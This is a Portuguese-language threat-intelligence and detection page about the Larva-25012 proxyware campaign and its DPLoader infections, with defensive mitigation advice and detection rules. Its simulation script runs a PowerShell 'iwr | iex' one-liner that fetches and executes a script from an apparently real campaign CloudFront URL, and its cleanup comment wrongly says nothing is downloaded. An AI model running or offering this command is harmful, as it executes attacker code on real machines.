Larva-25012: Uma Campanha de Distribuição de Proxyware em 2026
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumo
O ator da ameaça Larva-25012 está ativamente distribuindo Proxyware para monetizar sistemas comprometidos ao sequestrar a largura de banda de internet dos usuários. A campanha se baseia em infecções DPLoader existentes e depende de vários canais de distribuição, incluindo sites de download do YouTube e GitHub. O malware implanta várias famílias de Proxyware, incluindo DigitalPulse, SOAX, Appsalt e IPRoyal.
Investigação
O Centro de Inteligência de Segurança da AhnLab (ASEC) rastreou atividade contínua de proxyjacking e identificou operações renovadas de Larva-25012 durante a segunda metade de 2026. A investigação descobriu que os atacantes usam variantes de JavaScript e Python do DPLoader para manter a persistência e executar comandos PowerShell. Tarefas agendadas também são criadas para garantir que os scripts maliciosos continuem rodando em sistemas comprometidos.
Mitigação
Os usuários devem evitar baixar arquivos executáveis de sites suspeitos, anúncios pop-up ou plataformas de compartilhamento de arquivos não oficiais. O software deve ser obtido apenas de fontes confiáveis e legítimas, enquanto aplicativos pirateados e sites de download ilegais devem ser evitados. As organizações também devem manter soluções de proteção de endpoint, incluindo o V3, totalmente atualizadas.
Resposta
Quando atividade suspeita for detectada, os administradores devem identificar e encerrar processos PowerShell maliciosos e tarefas agendadas associadas às famílias de Proxyware afetadas. Os sistemas também devem ser verificados quanto ao DPLoader, que serve como um componente chave de infecção e persistência. Revisar o tráfego de rede de saída para conexões não autorizadas com infraestrutura C2 conhecida ou suspeita.
Fluxo de Ataque
Ainda estamos atualizando esta parte.
Detecções
Download ou Upload via Powershell (via linha de comando)
Processos Filhos Suspeitos do NodeJS [Windows] (via linha de comando)
Desativar Monitoramento em Tempo Real do Windows Defender e Outras Mudanças de Preferências (via linha de comando)
Chamar Métodos .NET Suspeitos do Powershell (via powershell)
Possível Abuso de Domínio de Desenvolvimento Cloudflare (via DNS)
IOCs (HashMd5) para detectar: Larva-25012: Uma Campanha de Distribuição de Proxyware de 2026
Detecção de Scripts de Instalação de Proxyware via PowerShell [Windows Powershell]
Execução de Simulação
-
Narrativa do Ataque & Comandos: Um adversário, tentando instalar proxyware para uso não autorizado de largura de banda (Larva-25012), executa um único comando PowerShell. O objetivo é contornar a varredura de arquivos local baixando a carga diretamente na memória. Eles utilizam a flag
-ExecutionPolicy Bypasspara garantir que o script seja executado eiwrpara buscar o arquivo de uma distribuição Cloudfront, canalizando-o paraiexpara execução imediata. Esta linha de comando específica é uma das assinaturas-alvo na regra de detecção. -
Script de Teste de Regressão:
# Simulação de Instalação de Proxyware Larva-25012 # Este comando é especificamente projetado para corresponder à seleção2 na regra de detecção. $cmd = 'PowerShell.Exe -ExecutionPolicy Bypass -Command "iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex"' # Usamos Start-Process para garantir que a linha de comando seja capturada como um evento de processo novo Start-Process "powershell.exe" -ArgumentList "-ExecutionPolicy Bypass -Command `"iwr -UseBasicParsing -Uri http://dhrciu5akloar.cloudfront.net/63563545600333.ps1 | iex`"" -
Comandos de Limpeza:
# Nenhum arquivo é realmente baixado devido à natureza do 'iex' pipe na simulação, # mas se quaisquer artefatos fossem criados, eles seriam removidos aqui. Write-Host "Limpeza da simulação completa. Nenhum artefato persistente criado."